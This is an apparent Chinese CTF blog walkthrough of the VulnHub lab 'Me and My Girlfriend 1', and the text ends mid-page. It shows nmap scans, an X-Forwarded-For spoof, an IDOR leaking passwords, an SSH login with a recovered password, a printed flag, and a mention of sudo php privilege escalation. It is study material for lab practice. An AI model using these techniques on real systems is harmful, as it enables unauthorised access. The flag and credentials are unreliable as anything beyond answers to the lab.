{"id":333,"date":"2025-11-10T16:02:20","date_gmt":"2025-11-10T08:02:20","guid":{"rendered":"https:\/\/www.sanjiuctf.com\/?p=333"},"modified":"2025-11-10T16:02:20","modified_gmt":"2025-11-10T08:02:20","slug":"me-and-my-girlfriend-1","status":"publish","type":"post","link":"https:\/\/www.sanjiuctf.com\/?p=333","title":{"rendered":"Me and My Girlfriend 1"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u4e0b\u8f7d\u5730\u5740\uff1a<a href=\"https:\/\/www.vulnhub.com\/entry\/me-and-my-girlfriend-1,409\/\">https:\/\/www.vulnhub.com\/entry\/me-and-my-girlfriend-1,409\/<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-59-1024x555.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-59-1024x555.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-334\" style=\"width:804px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6253\u5f00\u6211\u4eec\u7684Kali\uff0c\u67e5\u770bkali\u7684ip\u5730\u5740<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# ip add show eth0\n2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000\n    link\/ether 00:0c:29:b6:0a:72 brd ff:ff:ff:ff:ff:ff\n    inet 192.168.11.128\/24 brd 192.168.11.255 scope global dynamic noprefixroute eth0\n       valid_lft 1602sec preferred_lft 1602sec\n    inet6 fe80::220e:4db9:6143:b1dd\/64 scope link noprefixroute \n       valid_lft forever preferred_lft forever\n\n\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7531\u4e8e\u662f\u9776\u673a\u73af\u5883\uff0c\u76ee\u6807\u4e3b\u673a\u4e0e\u672c\u5730\u5728\u540c\u4e00\u7f51\u6bb5\uff0c\u4f7f\u7528nmap\u8fdb\u884c\u7f51\u6bb5\u626b\u63cf\uff0c\u63a2\u6d4b\u5b58\u6d3b\u4e3b\u673a\uff0c\u7531\u7ed3\u679c\u5224\u65ad192.168.11.133\u662f\u76ee\u6807\u4e3b\u673aip\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-60.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"829\" height=\"367\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-60.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-335\" style=\"width:806px;height:auto\"  sizes=\"auto, (max-width: 829px) 100vw, 829px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# nmap -sn 192.168.11.0\/24\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2025-06-29 07:15 EDT\nNmap scan report for 192.168.11.1 (192.168.11.1)\nHost is up (0.00011s latency).\nMAC Address: 00:50:56:C0:00:08 (VMware)\nNmap scan report for 192.168.11.2 (192.168.11.2)\nHost is up (0.000080s latency).\nMAC Address: 00:50:56:E7:08:6B (VMware)\nNmap scan report for 192.168.11.133 (192.168.11.133)\nHost is up (0.00026s latency).\nMAC Address: 00:0C:29:58:C4:B0 (VMware)\nNmap scan report for 192.168.11.254 (192.168.11.254)\nHost is up (0.00018s latency).\nMAC Address: 00:50:56:FA:F7:8A (VMware)\nNmap scan report for 192.168.11.128 (192.168.11.128)\nHost is up.\nNmap done: 256 IP addresses (5 hosts up) scanned in 1.92 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u200b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528nmap\u5bf9\u76ee\u6807\u4e3b\u673a\u8fdb\u884c\u626b\u63cf\uff0c\u663e\u793a\u5f00\u653e\u4e8622\u7aef\u53e3\u548c80\u7aef\u53e3\uff0c\u5206\u522b\u662fssh\u548chttp\u670d\u52a1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-61.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"531\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-61.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-336\" style=\"width:760px;height:auto\"  sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# nmap -A 192.168.11.254  \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2025-06-29 07:10 EDT\nStats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan\nSYN Stealth Scan Timing: About 75.50% done; ETC: 07:11 (0:00:05 remaining)\nNmap scan report for 192.168.11.254 (192.168.11.254)\nHost is up (0.00017s latency).\nAll 1000 scanned ports on 192.168.11.254 (192.168.11.254) are in ignored states.\nNot shown: 1000 filtered tcp ports (no-response)\nMAC Address: 00:50:56:FA:F7:8A (VMware)\nToo many fingerprints match this host to give specific OS details\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# nmap -A 192.168.11.133  \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2025-06-29 07:17 EDT\nStats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 50.00% done; ETC: 07:17 (0:00:06 remaining)\nNmap scan report for 192.168.11.133 (192.168.11.133)\nHost is up (0.00026s latency).\nNot shown: 998 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)\n|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)\n|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)\n|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))\n|_http-server-header: Apache\/2.4.7 (Ubuntu)\n|_http-title: Site doesn't have a title (text\/html).\nMAC Address: 00:0C:29:58:C4:B0 (VMware)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.26 ms 192.168.11.133 (192.168.11.133)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.94 seconds\n\nNetwork Distance: 1 hop\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.17 ms 192.168.11.254 (192.168.11.254)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 29.29 seconds<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u200b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-62-1024x552.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"552\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-62-1024x552.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-337\" style=\"width:675px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee\u4e00\u4e0b \u770b\u7f51\u9875\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-63-1024x547.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"547\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-63-1024x547.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-338\" style=\"width:701px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u793a\u6211\u4eec\u7528\u8fd9\u4e2ax-forwarded-for\u4f2a\u88c5\u6210\u672c\u5730\u8bbf\u95ee<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528burp\u6293\u5305<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-64-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-64-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-339\" style=\"width:804px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-65-1024x265.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"265\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-65-1024x265.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-340\" style=\"width:810px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fdb\u5165\u9875\u9762<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-66-1024x566.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"566\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-66-1024x566.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-341\" style=\"width:815px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u518c\u4e2a\u8d26\u53f7<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-67.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"531\" height=\"307\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-67.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-342\" style=\"width:803px;height:auto\"  sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u518c\u6210\u529f\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-68-1024x617.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"617\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-68-1024x617.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-343\" style=\"width:765px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6b64\u5904\u5b58\u5728\u8d8a\u6743\u8bbf\u95ee\uff0c\u4fee\u6539\u5730\u5740\u680f\u4e2d\u7684user_id\u53c2\u6570\uff0c\u5373\u53ef\u770b\u5230\u5176\u4ed6\u7528\u6237\u7684\u8d26\u53f7\u5bc6\u7801\u4fe1\u606f\uff0c\u5c1d\u8bd5\u52305\u65f6\uff0c\u53d1\u73b0\u7528\u6237\u6b63\u662falice<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-69-1024x581.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"581\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-69-1024x581.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-344\" style=\"width:716px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">f12\u6539\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-70-1024x650.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"650\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-70-1024x650.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-345\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">text<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6b64\u65f6\u6211\u4eec\u5df2\u7ecf\u77e5\u9053\u4e86alice\u7684\u8d26\u53f7\u548c\u5bc6\u7801\uff0c\u53ef\u4ee5\u53bb\u5c1d\u8bd5ssh\u767b\u5f55\u76ee\u6807\u4e3b\u673a\uff0c\u521d\u6b21\u767b\u9646\u65f6\u7cfb\u7edf\u4f1a\u63d0\u793a\u771f\u5b9e\u6027\u65e0\u6cd5\u786e\u5b9a\uff0c\u662f\u5426\u7ee7\u7eed\uff0c\u8f93\u5165yes\u540e\uff0c\u7cfb\u7edf\u4f1a\u8981\u6c42\u8f93\u5165\u5bc6\u7801\uff0c\u767b\u9646\u6210\u529f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">4lic3<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ssh alice@192.168.11.133<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9996\u5148\u67e5\u770b\u81ea\u5df1\u7684\u8eab\u4efd\u548c\u4f4d\u7f6e\uff0c\u7136\u540e\u5217\u51fa\u5f53\u524d\u76ee\u5f55\uff0c\u53d1\u73b0.my_secret\u76ee\u5f55<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fdb\u5165\u540e\u770b\u5230flag1.txt\uff0c\u67e5\u770b\u5176\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-71.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"695\" height=\"416\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-71.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-346\" style=\"width:666px;height:auto\"  sizes=\"auto, (max-width: 695px) 100vw, 695px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# ssh alice@192.168.11.133\nalice@192.168.11.133's password: \nLast login: Fri Dec 13 14:48:25 2019\nalice@gfriEND:~$ whoami\nalice\nalice@gfriEND:~$ pwd\n\/home\/alice\nalice@gfriEND:~$ ls -a\n.  ..  .bash_history  .bash_logout  .bashrc  .cache  .my_secret  .profile\nalice@gfriEND:~$ cd .my_secret\/\nalice@gfriEND:~\/.my_secret$ ls\nflag1.txt  my_notes.txt\nalice@gfriEND:~\/.my_secret$ flag1.txt\nflag1.txt: command not found\nalice@gfriEND:~\/.my_secret$ flag1.txt\nflag1.txt: command not found\nalice@gfriEND:~\/.my_secret$ cat flag1.txt\nGreattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!\n\nNow your last job is get access to the root and read the flag ^_^\n\nFlag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f97\u5230flag1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u73b0\u5728\u7684\u76ee\u6807\u662f\u63d0\u5347\u5230root\u6743\u9650\u62ff\u5230flag2\uff0c\u901a\u8fc7<code>sudo -l<\/code>\u67e5\u770b\u5f53\u524d\u7528\u6237\u53ef\u6267\u884c\u7684\u6307\u4ee4\uff0c\u53d1\u73b0\u53ef\u4ee5\u4f7f\u7528php<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528php\u63d0\u6743\uff0c\u8f93\u5165whoami\u540e\u663e\u793a\u5df2\u7ecf\u662froot\u6743\u9650\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-72.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"969\" height=\"626\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-72.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-347\"  sizes=\"auto, (max-width: 969px) 100vw, 969px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-73.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"962\" height=\"346\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-73.png\" 